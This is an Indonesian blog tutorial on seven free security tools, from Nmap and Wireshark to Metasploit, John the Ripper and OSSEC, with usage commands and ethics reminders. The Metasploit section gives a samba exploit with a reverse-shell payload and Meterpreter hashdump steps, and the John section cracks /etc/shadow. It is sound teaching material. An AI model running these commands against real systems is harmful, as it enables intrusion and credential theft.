Home » Tools & Software » 7 Tools Keamanan Siber Gratis yang Wajib Kamu Kuasai
Tools & Software

7 Tools Keamanan Siber Gratis yang Wajib Kamu Kuasai

Kotak perkakas digital dengan tujuh tools keamanan siber bercahaya di atas laptop, tema hacker profesional

7 Tools Keamanan Siber Gratis yang Wajib Kamu Kuasai

Lo tau nggak sih, dulu waktu gue baru mulai di dunia cybersecurity (sekitar tahun 2002), tools yang tersedia itu bisa diitung pake jari. Nggak kayak sekarang, di mana setiap minggu ada tools baru bermunculan. Tapi dari ratusan tools yang ada, ada beberapa yang udah teruji waktu, konsisten, dan jadi standar industri.

Di artikel ini gue bakal ngebahas 7 tools keamanan siber yang gratis, powerful, dan wajib lo kuasai. Gue nggak cuma sebutin nama—gue bakal kasih konteks, cara instalasi, dan contoh penggunaan dasarnya.

1. Nmap — Network Mapper

Kategori: Network scanning & discovery

Nmap adalah tools pertama yang gue install di setiap mesin baru. Ini network scanner standar de facto di industri.

Cara Install

sudo apt install nmap

Penggunaan Dasar

nmap 192.168.1.1                   # Single host
nmap 192.168.1.0/24                # Subnet
nmap -p 22,80,443 192.168.1.1      # Port spesifik
nmap -p- 192.168.1.1               # Semua 65535 port
nmap -sV 192.168.1.1               # Service version
nmap -O 192.168.1.1                # OS detection
nmap -A 192.168.1.1                # Aggressive scan
nmap -F 192.168.1.1                # Fast scan (top 100 ports)
sudo nmap -sS 192.168.1.1          # Stealth SYN scan
nmap -oA result 192.168.1.1        # Output all formats

Nmap Scripting Engine (NSE)

nmap --script smb-vuln-ms17-010 -p 445 192.168.1.1
nmap --script ssl-enum-ciphers -p 443 example.com
nmap --script http-enum -p 80 example.com
nmap --script safe 192.168.1.1    # Semua script "safe"

Kapan dipake: Mapping jaringan, inventory asset, troubleshooting, security assessment.

Tip: Jangan sembarangan scan jaringan yang bukan milik lo. Di beberapa negara, unauthorized scanning ilegal.

2. Wireshark — Network Protocol Analyzer

Kategori: Packet analysis & network forensics

Wireshark adalah “mikroskop” untuk ngeliat apa yang terjadi di kabel jaringan.

Cara Install

sudo apt install wireshark

Penggunaan Dasar

Buka Wireshark, pilih interface, klik Start. Gunakan display filter:

http                        # Hanya HTTP
tcp.port == 443             # Hanya HTTPS
ip.addr == 192.168.1.1      # Dari/ke IP spesifik
dns                         # Hanya DNS queries
!arp                        # Kecualikan ARP
tcp.flags.syn == 1          # Hanya SYN packets
http.request.method == "POST" # Hanya POST requests

Use Case

  • Troubleshooting koneksi lambat
  • Deteksi malware C2 communication
  • Analisis serangan network
  • Debugging aplikasi
  • Belajar protokol jaringan

Kapan dipake: Forensik jaringan, troubleshooting, belajar network.

Tip: Wireshark bisa decrypt HTTPS kalau lo punya SSLKEYLOGFILE.

3. Burp Suite Community Edition

Kategori: Web application security testing

Platform integrated untuk pengujian keamanan aplikasi web.

Fitur Community Edition

  • Proxy: Intercept dan modifikasi HTTP/HTTPS traffic
  • Repeater: Kirim request berulang dengan modifikasi
  • Decoder: Encode/decode data
  • Intruder (terbatas): Automated attack untuk fuzzing

Setup

  1. Konfigurasi browser untuk proxy Burp (127.0.0.1:8080)
  2. Install Burp’s CA certificate untuk intercept HTTPS
  3. Browsing seperti biasa, semua request lewat Burp
  4. Kirim request menarik ke Repeater
  5. Gunakan Intruder untuk fuzzing

Kapan dipake: Web app security testing. Wajib untuk bug bounty.

Tip: Pelajari Burp Extensions (BApp Store) seperti Active Scan++ dan Autorize.

4. Metasploit Framework (Ethical Use Only)

Kategori: Penetration testing framework

DISCLAIMER: Gunakan hanya untuk tujuan etis pada sistem yang lo punya izin tertulis.

Konsep Dasar

  • Exploit: Kode untuk mengeksploitasi vulnerability
  • Payload: Kode yang dijalankan setelah eksploitasi
  • Auxiliary: Module untuk scanning dan fuzzing
  • Post: Module post-exploitation
  • Encoder: Untuk menyamarkan payload

Penggunaan Dasar

msfconsole
search samba
use exploit/multi/samba/usermap_script
show options
set RHOSTS 192.168.1.100
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.1.50
exploit

Meterpreter

sysinfo              # Info sistem
getuid               # User saat ini
ps                   # List proses
migrate PID          # Pindah ke proses lain
hashdump             # Dump password hash
download/upload      # Transfer file

Kapan dipake: Penetration testing dan vulnerability validation.

5. John the Ripper

Kategori: Password cracking & security auditing

John the Ripper udah ada sejak 1996 dan tetap jadi standard password cracker.

Penggunaan Dasar

sudo apt install john

# Crack shadow file
john /etc/shadow

# Wordlist attack
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Dengan rules
john --wordlist=rockyou.txt --rules hashes.txt

# Lihat hasil
john --show hashes.txt

# Crack ZIP
zip2john protected.zip > zip.hash
john zip.hash

Kapan dipake: Security audit, recovery password yang sah.

6. Ghidra — NSA’s Reverse Engineering Tool

Kategori: Reverse engineering & malware analysis

Ghidra dikembangkan NSA dan dirilis open source 2019. Sangat powerful untuk membongkar binary executable.

Kemampuan

  • Disassembly: Lihat instruksi assembly
  • Decompilation: Decompile ke C code (sangat powerful)
  • Graphing: Function call graph, control flow
  • Scripting: Python/Java automation
  • Plugin support
  • Debugger

Kapan dipake: Malware analysis, vulnerability research, memahami proprietary software.

7. OSSEC — Host-based Intrusion Detection System

Kategori: Intrusion detection & file integrity monitoring

OSSEC melakukan log analysis, file integrity monitoring, rootkit detection, dan active response.

Arsitektur

Client-server: OSSEC Server mengumpulkan alert, OSSEC Agent diinstal di server yang dimonitor.

Kemampuan

  • Log analysis dan korelasi
  • File integrity monitoring (mendeteksi perubahan file)
  • Rootkit detection
  • Active response (otomatis blokir IP)

Kapan dipake: Compliance (PCI DSS, ISO 27001), deteksi intrusion.

Tip: Cek Wazuh, fork OSSEC dengan UI modern dan integrasi ELK stack.

Membangun Toolkit Sendiri

Network Security: Nmap, Wireshark, lalu iptables/nftables
Web App Security: Burp Suite, Nmap (recon)
Penetration Testing: Nmap, Metasploit, John the Ripper, Burp Suite
Malware Analysis: Ghidra, Wireshark
Blue Team / Defense: Wireshark, OSSEC/Wazuh, Nmap

Ethical Reminder

Semua tools di atas adalah double-edged sword. GUNAKAN HANYA UNTUK TUJUAN ETIS:

  • Setup lab sendiri untuk belajar
  • Ikut program bug bounty legal
  • Ambil sertifikasi (eJPT, OSCP)
  • Bergabung dengan komunitas ethical hacking

JANGAN PERNAH scan atau exploit sistem tanpa izin.

Kesimpulan

Tools adalah perpanjangan skill lo. Pahami tools dengan baik, bikin lab, dan mulai eksplorasi.

Lebih Dalam Tentang Nmap

Satu hal yang sering dilupain pemula: Nmap bukan cuma tools scanning port. Nmap punya kemampuan yang jauh lebih dalam. Misalnya, Nmap scripting engine (NSE) punya lebih dari 600 script yang bisa dipake untuk vulnerability detection, exploitation, discovery, brute force, dan masih banyak. Beberapa script favorit gue:

# Cek SMB vulnerability (EternalBlue)
nmap --script smb-vuln-ms17-010 -p 445 192.168.1.0/24

# Enumerasi HTTP
nmap --script http-enum,http-headers,http-methods -p 80,443 target.com

# Deteksi WAF
nmap --script http-waf-detect -p 80,443 target.com

# Cek SSL/TLS
nmap --script ssl-enum-ciphers -p 443 target.com

# Deteksi malware beacon
nmap --script http-malware-host -p 80 target.com

Output Nmap juga bisa disimpen dalam berbagai format: XML (untuk diparse oleh tools lain), greppable (buat processing dengan grep/awk), dan normal. Kalau lo serius jadi pentester, pelajari cara nge-parse Nmap XML output dengan Python — ini akan sangat berguna buat automasi.

Lebih Dalam Tentang Burp Suite

Burp Suite Community Edition emang terbatas, tapi jangan remehin. Dengan kreativitas, lo bisa melakukan banyak hal. Beberapa tips:

Burp Macros: Lo bisa bikin macro untuk otomatisasi sequence request yang kompleks, kayak login -> ambil session token -> jalankan scan. Ini berguna buat aplikasi yang perlu authenticated session.

Collaborator (Pro only, tapi…): Kalau lo pakai Burp Pro, Burp Collaborator adalah fitur game-changing untuk deteksi blind vulnerabilities (blind SSRF, blind XXE, out-of-band RCE). Tapi ada alternatif gratis kayak interactsh dari ProjectDiscovery.

Match & Replace: Fitur ini bisa auto-modify request di proxy. Misalnya, ganti User-Agent untuk bypass WAF, atau tambahin header custom untuk semua request.

Scope: JANGAN LUPA SET SCOPE! Tanpa scope, Burp akan intercept semua traffic—termasuk traffic dari aplikasi lain di background, update checker, dll. Set scope ke target domain aja.

Sumber Belajar

Tools hanyalah alat. Yang lebih penting adalah methodology. Gue sangat merekomendasikan:

  • TryHackMe: Platform belajar interaktif, banyak room tentang tools spesifik
  • HackTheBox Academy: Lebih terstruktur, tapi sebagian berbayar
  • PortSwigger Web Security Academy: Gratis, lengkap, dari Burp Suite creator
  • YouTube: IppSec, The Cyber Mentor, NetworkChuck

Memilih Tools yang Tepat untuk Situasi yang Tepat

Sebagai pemula, godaan terbesar adalah pengen install semua tools dan nyobain semuanya sekaligus. Ini pendekatan yang salah. Lebih baik kuasai 2-3 tools dulu secara mendalam daripada punya 50 tools tapi cuma tau dasarnya.

Untuk Bug Bounty / Web Pentest: Burp Suite + browser + subdomain enumeration tools (subfinder, assetfinder). Jangan langsung lompat ke Metasploit. 80% bug bounty findings adalah web vulnerabilities yang bisa ditemukan dengan Burp Suite dan ketelitian.

Untuk Network Pentest: Nmap untuk initial recon, Metasploit untuk exploitation, dan jika perlu, John the Ripper/Hashcat untuk password cracking. Tapi ingat: methodology lebih penting daripada tools. Tanpa methodology yang sistematis, lo cuma akan asal scan dan jalan di tempat.

Untuk Blue Team / Defense: Wireshark untuk analisis trafik, OSSEC/Wazuh untuk HIDS, ditambah ELK stack (Elasticsearch, Logstash, Kibana) untuk log aggregation. Di dunia defense, kemampuan membaca log dan mengkorelasi event adalah skill paling berharga.

Untuk Malware Analysis: Ghidra untuk reverse engineering statis, Wireshark untuk analisis network behavior malware, dan sandbox environment yang aman (VM terisolasi tanpa network). Jangan pernah analisis malware di mesin host lo!

Pipeline Tools yang Saling Melengkapi

Tools ini nggak berdiri sendiri. Mereka membentuk pipeline:

  1. Nmap → Discovery: host apa yang hidup? port apa yang terbuka?
  2. Burp Suite → Web Exploration: endpoint apa yang ada di aplikasi web?
  3. Metasploit → Exploitation: kalau nemu vulnerability, exploit untuk validasi
  4. Wireshark → Forensics: kalau exploit gagal atau aneh, analisis trafik untuk debug
  5. John the Ripper → Post-exploit: kalau dapet hash, crack untuk privilege escalation
  6. Ghidra → Research: kalau nemu binary mencurigakan, reverse engineer
  7. OSSEC → Defense: setelah tau cara attacker masuk, setup rules untuk deteksi

Ini adalah flow yang banyak pentester dan security engineer pake setiap hari. Tools berbeda untuk fase berbeda.

Kesimpulan Akhir

Gue udah pake semua tools ini selama bertahun-tahun, dan satu hal yang gue pelajari: tools datang dan pergi, tapi skill fundamental tetap. Jangan jadi “script kiddie” yang cuma bisa klik-klik tools tanpa ngerti cara kerjanya. Pahami CONCEPT di balik setiap tool.

Misalnya, jangan cuma tau “nmap bisa scan port.” Pahami gimana TCP three-way handshake bekerja, gimana SYN scan beda dari TCP connect scan, dan gimana OS fingerprinting bekerja. Ini yang membedakan profesional dari amatir.

Mulai dari satu tools, kuasai secara mendalam, lalu lanjut ke tools berikutnya. Rome wasn’t built in a day, dan cybersecurity expert juga nggak dibangun dalam semalam. But with consistent effort, lo will get there.


Penulis tersertifikasi OSCP, CISSP, dan telah menggunakan semua tools ini dalam pekerjaan profesional.

Banditz Cyber Verified
Security Researcher at IT Security
Banditz Cyber adalah security researcher di IT Security yang berfokus pada keamanan web, analisis kerentanan, dan edukasi keamanan siber. Melalui tulisannya, ia membagikan panduan praktis, riset teknis, dan wawasan keamanan digital dengan pendekatan yang mudah dipahami.
View all posts